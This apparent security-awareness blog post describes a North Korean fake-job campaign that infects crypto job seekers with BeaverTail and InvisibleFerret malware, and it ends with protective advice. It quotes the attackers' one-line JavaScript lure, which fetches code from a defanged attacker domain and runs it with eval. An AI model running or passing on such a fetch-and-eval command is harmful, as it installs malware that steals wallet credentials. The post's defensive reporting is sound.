Job hunting is stressful enough but what if the “dream job” you applied for was actually a front for hackers? A North Korean cyber-espionage group, known as “Contagious Interview” (a subgroup of the infamous Lazarus Group), has been setting up fake cryptocurrency consulting firms to deliver malware to unsuspecting job seekers.
These hackers have created three convincing-looking companies BlockNovas LLC, Angeloper Agency, and SoftGlide LLC complete with professional websites, LinkedIn profiles, and even fake employee testimonials. Their targets? Cryptocurrency developers, traders, and finance professionals lured by high-paying remote job offers.
But instead of a paycheck, victims get hit with BeaverTail, InvisibleFerret, and OtterCookie three custom malware strains designed to steal crypto wallet credentials, browser data, and even grant hackers remote access to their computers.
How the Scam Works: A Fake Interview, a Real Infection
The scheme starts like any legitimate job hunt. Victims apply through platforms like Upwork, Freelancer, or crypto-specific job boards. After initial contact, they’re directed to the fake company’s website for an “interview process.”
The real trap comes during the “technical assessment” phase, where applicants are asked to:
-
Record a video introduction
-
Run a piece of code to “fix” camera permission errors
Here’s the malicious code they’re tricked into executing:
fetch(eval(decodeURIComponent('\'lianxinxiao[.]com:5000/tokenizer''))) .then(response => response.text()) .then(data => { eval(data); });
This seemingly harmless script fetches and runs BeaverTail, a JavaScript-based malware that then downloads InvisibleFerret, a Python backdoor. Once installed, the malware:
-
Steals MetaMask, Coinbase, Phantom, and other crypto wallet credentials
-
Logs keystrokes and browser activity
-
Establishes persistence (even after reboots)
Fake Employees, AI-Generated Faces, and Convincing Lies
To make their fake companies seem real, the hackers:
✅ Use AI-generated profile pictures for fake “employees”
✅ Post fabricated work histories and client testimonials on LinkedIn
✅ Maintain professional-looking websites with SSL certificates
Security firm Silent Push uncovered the scam after analyzing unusual malware samples linked to domains like lianxinxiao[.]com. One victim reported their MetaMask wallet was drained shortly after running code from BlockNovas.
How to Protect Yourself from Job Scams
Since these attacks prey on job seekers’ trust, here’s how to stay safe:
✔ Verify the company: Check domains, employee profiles, and reviews across multiple sources.
✔ Never run code during interviews: Legitimate jobs won’t ask you to execute random scripts.
✔ Use a separate device for crypto: Keep wallets on a dedicated machine with no job-related activity.
✔ Enable 2FA everywhere: Especially on crypto wallets and email accounts.
Final Thoughts: A Growing Threat
North Korean hackers have long used social engineering to fund their operations—whether through crypto heists, ransomware, or phishing. This latest tactic shows just how far they’ll go to exploit job seekers.
If a job offer seems too good to be true, it probably is. Always double-check before engaging in technical tests—your crypto wallet might depend on it.
Why This Matters
With remote work on the rise, job scams are becoming more sophisticated. Hackers are no longer just sending phishing emails they’re building entire fake companies to trick victims. Staying informed is the best defense.
Discover more from CyberAwareHub
Subscribe to get the latest posts sent to your email.